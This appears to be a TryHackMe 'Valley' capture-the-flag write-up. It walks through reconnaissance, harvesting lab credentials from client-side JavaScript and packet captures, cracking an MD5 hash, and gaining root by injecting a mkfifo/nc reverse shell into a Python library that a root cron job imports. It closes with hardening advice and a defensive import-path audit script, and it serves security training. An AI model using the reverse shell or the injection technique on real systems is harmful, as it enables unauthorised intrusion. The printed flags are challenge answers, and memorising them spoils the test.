# Valley (TryHackMe Challenge) – Findings & Recommendations Report

---

## 1️⃣ Port Scanning

### 1.1 Nmap Scan

```bash
nmap -v -sS <target IP>
```

**Open Ports:**

| Port | State | Service |
| ---- | ----- | ------- |
| 22   | open  | SSH     |
| 80   | open  | HTTP    |

**Website Findings:**

* The image gallery used **unencrypted, hierarchical, and insecure paths** (predictable, sequentially numbered image URLs).
* Requesting URLs beyond the last image returned an error page that disclosed the **web server type and version**:

```
Apache/2.4.41 (Ubuntu) Server at 10.10.149.238 Port 80
```

### 1.2 RustScan

```bash
rustscan -a 10.10.125.123
```

**Open Ports:**

* 22/tcp – SSH
* 80/tcp – HTTP
* 37370/tcp – FTP (**unusual port**)

---

## 2️⃣ Website Enumeration

### 2.1 Initial Search

* No sensitive findings on the homepage.

### 2.2 Directory Brute-Forcing

```bash
gobuster dir -u http://10.10.125.123 -w directory-list-lowercase-2.3-medium.txt
```

**Discovered Directories:**

| Path           | Status | Notes                    |
| -------------- | ------ | ------------------------ |
| /gallery       | 301    | Linked from homepage     |
| /static        | 301    | Not linked from homepage |
| /pricing       | 301    | Linked from homepage     |
| /server-status | 403    | Restricted               |

---

## 3️⃣ Suspicious URL Enumeration

```bash
gobuster dir -u http://10.10.125.123/static/ -w directory-list-lowercase-2.3-medium.txt
```

* `/00` – only **127 bytes** → **suspicious** (far smaller than the image responses)
* The other directories `/1` … `/18` corresponded to **image files**

---

## 4️⃣ Hidden Dev Notes & Login

* Developer notes at `/dev1243224123123/` included:

```
- add wedding photo examples
- redo editing on #4
- remove /dev1243224123123
- check for SIEM alerts
```

* The login page's JavaScript contained **hardcoded credentials** (client-side authentication check):

```javascript
if (username === "siemDev" && password === "california")
```

**Credentials:**

* **Username:** siemDev
* **Password:** california

---

## 5️⃣ FTP Access

```bash
ftp 10.10.107.34 37370
```

* Directory listing:

```
-rw-rw-r-- 1 1000 1000    7272 siemFTP.pcapng
-rw-rw-r-- 1 1000 1000 1978716 siemHTTP1.pcapng
-rw-rw-r-- 1 1000 1000 1972448 siemHTTP2.pcapng
```

* Downloaded the `.pcapng` files → **Wireshark analysis**
* Found credentials submitted in cleartext in an HTTP POST request:

```
userName: valleyDev
password: ph0t0s1234
```

---

## 6️⃣ SSH Access

```bash
ssh valleyDev@10.10.89.228
```

* **User flag:**

```
h3THM{k@l1_1n_th3_v@lley}
```

---

## 7️⃣ Privilege Escalation – Root Access

### 7.1 File Discovery

* `/home/valley/valleyAuthenticator` – **packed (UPX-compressed) binary**

### 7.2 Local Analysis

```bash
scp valleyDev@10.10.157.63:/home/valleyAuthenticator /root/
strings valleyAuthenticator
```

* UPX compression detected:

```
UPX!
```

* Decompress:

```bash
upx -d valleyAuthenticator
```

### 7.3 Extracting Credentials

* Found a hashed password in the unpacked binary:

```
e6722920bab2326f8217e4bf6b1b58ac
```

* Cracked it using John the Ripper (raw MD5):

```bash
john --wordlist=/root/Tools/wordlists/rockyou.txt --format=raw-md5 passToCrack.txt
```

* **Recovered credentials:**
  * Username: valley
  * Password: liberty123

---

## 8️⃣ SSH Access as Valley User

```bash
ssh valley@10.10.253.236
scp /opt/PEAS/linPEAS/linpeas.sh valley@10.10.253.236:/home/valley/
bash linpeas.sh 2>&1 | tee linpeas_output.txt
```

* LinPEAS revealed **no notable misconfigurations**

---

## 9️⃣ Privilege Escalation via Cron & Python Library Injection

* `/etc/crontab` contained a root job:

```
1 * * * * root python3 /photos/script/photosEncrypt.py
```

* The crontab itself could not be modified.
* Injected a **reverse shell** into the Python library `base64.py`, which the cron script imports, so root executed it on the next run:

```python
import os
os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.205.94 9001 >/tmp/f')
```

* Listener on the attack machine:

```bash
nc -l 9001
```

* **Root shell obtained**

```bash
whoami
root
```

---

## 🔟 Root Flag

```bash
cat /root/root.txt
THM{v@lley_0f_th3_sh@d0w_0f_pr1v3sc}
```

---

## 11️⃣ Recommendations & Hardening

1. **SSH Security**
   * Disable password-based SSH login; enforce key-based authentication.
   * Restrict SSH access to trusted IPs only.
2. **Web Server**
   * Remove unlinked directories (e.g., `/static/00`) and leftover developer paths.
   * Secure sensitive paths; never perform authentication checks in client-side JavaScript.
   * Enable HTTPS and secure session management.
3. **FTP**
   * Avoid unusual ports and anonymous access.
   * Use strong passwords and IP restrictions.
4. **Cron Jobs**
   * Limit root-level cron scripts to trusted binaries only.
   * Enforce strict file permissions on the scripts and on every library they import.
5. **Binary Protection**
   * Do not store credentials in binaries (packing does not hide them).
   * Use environment variables or secure vaults.
6. **Monitoring & Alerting**
   * File integrity monitoring.
   * Audit unusual ports and unexpected services.

---

✅ **Conclusion:** The attack chain executed fully: reconnaissance → FTP access → SSH access → reverse engineering → privilege escalation → root flag retrieval. Implementing the above recommendations will significantly reduce risk from similar attacks.

---
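As an added check for the cron finding in section 9 and recommendation 4, the script below audits a root cron job's Python import path for directories or module files that a non-root principal can write. It is example code written for this report, not part of the original write-up or the room; the `/photos/script` directory and the `base64` module name are assumed from the crontab line above.

```python
"""Audit a cron job's Python import path for writable modules.

The chain in section 9 works because a module imported by the root cron
script (base64.py) could be modified by an unprivileged user, so root ran
attacker-controlled code on the next run. This flags any directory on the
import path, or any module file in it, that a non-root principal can write.
"""
import os
import sys

S_IFDIR, S_IWGRP, S_IWOTH = 0o040000, 0o000020, 0o000002


def writable_by_non_root(mode, uid, gid):
    """True if someone other than root could modify or replace the object."""
    if uid != 0:
        return True                       # unprivileged owner can always write
    if mode & S_IWOTH:
        return True                       # world-writable
    if gid != 0 and mode & S_IWGRP:
        return True                       # writable by a non-root group
    return False


def audit_import_path(entries):
    """Pure check over {path: (mode, uid, gid)} so it is testable offline."""
    findings = []
    for path, (mode, uid, gid) in entries.items():
        if writable_by_non_root(mode, uid, gid):
            kind = "directory" if mode & 0o170000 == S_IFDIR else "module"
            findings.append(f"{kind} writable by non-root: {path}")
    return sorted(findings)


def collect_entries(search_path, modules=("base64",)):
    """Stat each import directory and each <dir>/<module>.py that exists."""
    entries = {}
    for d in search_path:
        for p in [d] + [os.path.join(d, m + ".py") for m in modules]:
            if os.path.exists(p):
                st = os.stat(p)
                entries[p] = (st.st_mode, st.st_uid, st.st_gid)
    return entries


if __name__ == "__main__":
    # Python puts the script's own directory first on sys.path, so prepend the
    # cron script's directory (assumed: /photos/script from the crontab line).
    path = ["/photos/script"] + [p for p in sys.path if p]
    for line in audit_import_path(collect_entries(path)) or ["no writable entries"]:
        print(line)
```

Run it with the same interpreter the cron job uses (e.g. `sudo python3 audit_pypath.py`) so the audited `sys.path` matches what root resolves.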